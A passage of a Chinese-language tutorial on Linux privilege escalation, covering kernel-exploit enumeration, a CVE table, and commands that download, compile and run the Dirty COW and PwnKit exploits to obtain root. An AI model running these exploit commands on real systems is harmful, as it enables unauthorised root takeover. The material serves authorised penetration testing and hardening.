Linux中如何通过常见方法实现权限提升?
摘要:常见Linux权限提升笔记 本文系统介绍Linux系统中常见的权限提升技术,包括检测方法和利用方式,适用于渗透测试和安全加固场景。 目录 1. 内核漏洞提权 2. SUIDSGID提权 3. Sudo配置不当提权 4. 计划任务提权 5.
常见Linux权限提升笔记
本文系统介绍Linux系统中常见的权限提升技术,包括检测方法和利用方式,适用于渗透测试和安全加固场景。
目录
1. 内核漏洞提权
2. SUID/SGID提权
3. Sudo配置不当提权
4. 计划任务提权
5. 环境变量劫持
6. 密码信息泄露
7. 容器逃逸
8. Capabilities提权
9. 数据库高权限提权
10. 提权工具集
1. 内核漏洞提权
💡 原理介绍
内核漏洞提权是利用Linux内核本身存在的安全漏洞,通过编译或运行针对特定内核版本的exploit代码,直接提升至root权限。常见的内核漏洞包括本地权限提升、条件竞争、缓冲区溢出等。
🔍 检测方法
# 获取内核版本信息
uname -a
uname -r
cat /proc/version
cat /etc/issue
cat /etc/*-release
# 查看系统架构
uname -m
# 使用自动化工具检测
# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
# linux-exploit-suggester-2
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
#综合脚本
https://github.com/peass-ng/PEASS-ng
⚔️ 常见内核漏洞
漏洞名称
CVE编号
影响版本
描述
Dirty COW
CVE-2016-5195
2.x - 4.8.3
竞态条件导致的写时复制漏洞
Dirty Pipe
CVE-2022-0847
5.8 - 5.16.11
管道缓冲区覆盖漏洞
PwnKit
CVE-2021-4034
pkexec
polkit的pkexec本地提权
Baron Samedit
CVE-2021-3156
sudo < 1.9.5p2
sudo堆溢出漏洞
DirtyCred
CVE-2022-2588
5.8 - 5.19.x
内核凭证覆盖漏洞
🎯 利用方式
Dirty COW示例:
# 下载exploit
wget https://github.com/firefart/dirtycow/raw/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
# 执行提权(会创建新的root用户firefart)
./dirty yourpassword
# 使用新密码登录
su firefart
PwnKit提权(CVE-2021-4034):
# 下载exploit
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
make
# 执行
./cve-2021-4034
# 获得root shell
⚠️ 注意事项
内核exploit可能导致系统崩溃,生产环境慎用
编译时需要gcc和内核头文件
注意目标系统架构(x86/x64/ARM)匹配
2. SUID/SGID提权
💡 原理介绍
SUID(Set User ID)和SGID(Set Group ID)是Linux的特殊权限位。当一个可执行文件设置了SUID位,任何用户执行该文件时都会以文件所有者的权限运行。如果一个root拥有的程序设置了SUID位且存在安全问题,普通用户就可能利用它提权到root。
